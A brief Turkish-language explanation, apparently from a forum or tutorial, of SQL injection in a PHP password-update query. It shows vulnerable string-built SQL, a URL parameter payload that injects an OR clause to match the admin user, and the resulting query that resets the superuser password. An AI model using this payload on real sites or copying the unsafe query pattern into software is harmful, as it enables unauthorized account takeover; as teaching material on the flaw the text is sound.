Kod:
$query = "UPDATE usertable SET pwd='$pwd' WHERE uid='$uid'";
Browserdan girilecek deger;
http://mysite/code.php?uid=' or uid like 'admin
Gibi basit bir ornekle magic_quotes kapali ve register_globals acikken sorgu
UPDATE usertable SET pwd='$pwd' WHERE uid='' or uid like 'admin'";
donusmektedir ve superuser'in sifresini onaysiz degistirebilir.